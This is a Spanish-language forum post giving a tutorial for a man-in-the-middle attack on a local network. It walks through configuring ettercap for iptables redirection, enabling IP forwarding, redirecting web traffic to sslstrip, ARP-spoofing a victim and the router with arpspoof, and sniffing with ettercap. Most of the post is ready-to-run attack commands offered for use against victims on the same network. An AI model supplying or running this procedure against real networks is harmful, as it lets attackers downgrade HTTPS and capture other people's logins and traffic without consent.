0 Usuarios y 1 Visitante están viendo este tema.

*

D3M0N

  • Founder
  • Usuario
  • *****
  • 3.034

Bueno, hoy les traigo un tuto...  :o asusta pero esta muy bueno...  8) en cuention se ejecuta en BackTrack pero solo necesitamos unos programitas y editar un par de cosas y listo.


El ataque MITM es uno de esos ataques en que el atacante debe de estar en la misma red que la victima. No importa el SO de la victima y las herramientas usadas son las siguientes:

+ sslstrip
+ arpspoof
+ ettercap

El ataque lo realice desde Backtrack 4 R2 y fue de la siguiente manera:
Primero editamos el siguiente archivo eliminando “#” para que se vea como acontinuaciín:

Código: [Seleccionar]
kate /etc/etter.conf

#---------------
#     Linux
#---------------

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


Despues en otra terminal:

Código: [Seleccionar]
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
dhclient
sslstrip -a -k -f

En otra terminal:

Código: [Seleccionar]
arpspoof -i wlan0 -t ip-victima ip-ruter
arpspoof -i wlan0 -t 192.168.1.99 192.168.1.254

y al final en otra terminal:

Código: [Seleccionar]
ettercap -T -q -i wlan0
En el siguiente video muestro como controlo a 2 maquinas (ssh/vnc) para efectuar el ataque:


FUENTE: XMUDA